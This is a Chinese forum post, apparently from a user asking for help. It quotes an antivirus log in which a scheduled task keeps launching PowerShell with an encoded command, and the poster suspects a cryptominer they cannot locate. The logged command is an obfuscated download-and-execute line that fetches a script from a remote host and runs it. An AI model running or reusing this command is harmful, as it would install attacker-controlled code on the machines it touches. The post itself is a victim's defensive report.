|
|
操作进程:C:\WINDOWS\system32\svchost.exe
命令行:C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
父进程:C:\WINDOWS\system32\services.exe
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
操作结果:已阻止
基本一两个小时就会触发一次。但是全盘杀毒后无发现。看到论坛有类似的帖子说是挖矿病毒,要关闭远程端口。但我希望能找到病毒的文件,否则天天看到火绒有个红点提示也很烦。联系QQ:④18665127
|
|
收藏
